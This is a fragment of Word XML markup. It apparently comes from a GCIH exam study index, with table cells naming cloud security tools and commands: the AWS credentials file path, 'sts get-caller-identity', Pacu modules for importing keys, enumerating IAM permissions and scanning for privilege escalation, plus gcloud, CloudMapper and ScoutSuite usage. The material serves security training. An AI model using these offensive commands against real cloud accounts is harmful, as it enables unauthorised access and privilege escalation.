          <w:p w14:paraId="7E2E044B" w14:textId="5E6AB9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.aws/credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1390B4A2" w14:textId="26A6DE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1949CAA7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D874E31" w14:textId="3F5BAF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sts get-caller-identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4385936D" w14:textId="6ABB6C5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651498F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF03339" w14:textId="3B611F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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A745D3F" w14:textId="33395A7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2CDB0D2C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="177FAE72" w14:textId="180514E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Pacu: AWS Interrogation and Attack Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE46C8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./cli.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1854076F" w14:textId="43E621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import_keys jmerckle  run iam_enum_permission  run iam_privesc_scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AADF3C1" w14:textId="3A4F8A6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2C93A6A4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A950AE7" w14:textId="15FEEA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gcloud sql instance_list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D1BE1F" w14:textId="187D53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0A05037C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="376CA218" w14:textId="6F7EFB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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736EE3D7" w14:textId="1B01FD4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4B06C01" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D63746D" w14:textId="7595273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Post-Exploitation Defenses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7673A5" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3F6DD0" w14:textId="365D9C0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0EC8AA70" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2C3EE6" w14:textId="760F60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CloudMapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F75E3E8" w14:textId="1FB34F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cloudmapper.py prepare --config config.json --account acctname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B519C4" w14:textId="403784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469B5B2E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433F49C7" w14:textId="46FF5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ScoutSuite (AWS, GCP, Azure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFE2EE2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B597AE7" w14:textId="2CD843B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C4B6CDF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5105DC63" w14:textId="4CA75C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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CCEFEF" w14:textId="7FAAA87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4FCE90A7" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249C8C04" w14:textId="4B9369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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33784BBF" w14:textId="510E7131"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10D6B1F6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429047E3" w14:textId="430EF0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Where To Go From Here</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3422948D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA9AAD5" w14:textId="32193E0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55F21DF0" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033EEA9C" w14:textId="2F33C8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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654538E3" w14:textId="0D6DEC4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6ACDB87B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4473645E" w14:textId="709B1F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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0B7C47" w14:textId="4D0E808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649A3BCF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="712B4250" w14:textId="210A8FD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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC05097" w14:textId="4065132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5A625067" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF556E2" w14:textId="77C0EFC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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F703D4" w14:textId="009DB3A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4E799FA8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08B3633A" w14:textId="3FBC7A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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405E5F27" w14:textId="3D014B9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05375523" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AEED1AA" w14:textId="3CA97B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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B56B498" w14:textId="75BD650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38B36002" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C9CAB9" w14:textId="4CFF4F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GCIH Practical Exam: CyberLive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7672FF15" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34B0CDB4" w14:textId="7DD990E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E29D87D" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5476ED17" w14:textId="79A9F2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Taking the Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71726651" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCC1EE5" w14:textId="1E9A27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7146CFFD" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066312F3" w14:textId="07C98D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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A09A3D0" w14:textId="1AE9102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1A188A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C868D4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9"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A31610"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50067CE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A964B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0225B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CA6BE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25DCE8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5C26D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37260FB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38018B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B62A09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8230620"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="401021E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82F3E0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79DE99DA"/>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B534921"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E930742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09F738B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E063F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0C70A46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9ECCA31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1AD67B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBBC1F4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967771"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D700CBF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E895559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F6E108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0A11EAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B254F02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4F06E2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C282AF6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68C2B9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B69874DC"/>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D6A22BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="941A2C4C"/>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DD40C83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FEEC596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1FB5BB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E138C0A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2FA78AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF8E9EE8"/>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56E1365C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F6653E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6E966A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CA0D3D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C266205"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="344499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FA33269"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FE246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FB16028"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="714289E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33D665C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E5C601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91A5D0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9738A57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C61120B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D52A5A8C"/>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2BD1B6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2998129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41C1F12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5646111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54C29F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0598EC0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6DA505E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6CC4B4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75"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="730345073">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="442502861">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1337614253">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1899902729">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1140457709">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1508910218">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="350881188">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="169300240">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="44063332">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1228227898">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="853571747">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1494176624">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1184855497">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="880173853">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1119714849">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="45374067">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="921253157">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="297301359">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1304039053">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1845898013">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="559025177">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="25109893">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="594946370">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1983807312">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="912590134">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="471562334">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1804618147">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1036810954">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1076707844">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1624921277">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="779685406">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="541400971">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="243877396">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1637906529">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1132673129">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="857700271">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="591935005">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="875508104">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="2097893808">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1380477564">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1107314495">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="358286581">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="256641047">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1375038597">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="283510748">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="458841949">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="223444933">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="2075198999">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="129788674">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1967274445">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1224367206">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="996110258">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1920365578">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="25526047">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1812402412">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1729761339">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1933001750">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="679426138">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="647706623">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="938029640">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="848183288">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1471241796">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="688139564">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="533035276">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="567542367">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1336955901">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1701316790">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="207955284">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="1109467954">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="283073969">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1275291423">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="1262446886">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="2142190667">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="595208699">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="1757439764">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="2026246980">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="1502159276">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="740906375">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="14432268">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="1321932433">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="1912154300">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="1351294780">
    <w:abstractNumId w:val="1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2213E"/>
    <w:rsid w:val="00030003"/>
    <w:rsid w:val="000459AB"/>
    <w:rsid w:val="00051475"/>
    <w:rsid w:val="00055B52"/>
    <w:rsid w:val="000712E4"/>
    <w:rsid w:val="00090F03"/>
    <w:rsid w:val="000B4054"/>
    <w:rsid w:val="000C2DB2"/>
    <w:rsid w:val="000D2BA4"/>
    <w:rsid w:val="000F53F8"/>
    <w:rsid w:val="0010221B"/>
    <w:rsid w:val="0011119D"/>
    <w:rsid w:val="0013351D"/>
    <w:rsid w:val="00145C5E"/>
    <w:rsid w:val="00153DA7"/>
    <w:rsid w:val="00160408"/>
    <w:rsid w:val="00171B11"/>
    <w:rsid w:val="001756B5"/>
    <w:rsid w:val="0018497E"/>
    <w:rsid w:val="00185DD3"/>
    <w:rsid w:val="001B3494"/>
    <w:rsid w:val="001D4DAE"/>
    <w:rsid w:val="001D6D31"/>
    <w:rsid w:val="001E019A"/>
    <w:rsid w:val="001E6DEA"/>
    <w:rsid w:val="001E7404"/>
    <w:rsid w:val="001F47FE"/>
    <w:rsid w:val="00223952"/>
    <w:rsid w:val="002257B2"/>
    <w:rsid w:val="00235885"/>
    <w:rsid w:val="0025478D"/>
    <w:rsid w:val="00256052"/>
    <w:rsid w:val="002664A6"/>
    <w:rsid w:val="00272FB9"/>
    <w:rsid w:val="0027605D"/>
    <w:rsid w:val="00281436"/>
    <w:rsid w:val="002912C4"/>
    <w:rsid w:val="002C43F0"/>
    <w:rsid w:val="002D74EE"/>
    <w:rsid w:val="00303D06"/>
    <w:rsid w:val="0032328D"/>
    <w:rsid w:val="003254FD"/>
    <w:rsid w:val="00327A25"/>
    <w:rsid w:val="00335AF4"/>
    <w:rsid w:val="0034189A"/>
    <w:rsid w:val="003544B9"/>
    <w:rsid w:val="003548AD"/>
    <w:rsid w:val="00360A1C"/>
    <w:rsid w:val="0036128A"/>
    <w:rsid w:val="003654AC"/>
    <w:rsid w:val="00375787"/>
    <w:rsid w:val="00381AE9"/>
    <w:rsid w:val="003867D2"/>
    <w:rsid w:val="003A28B0"/>
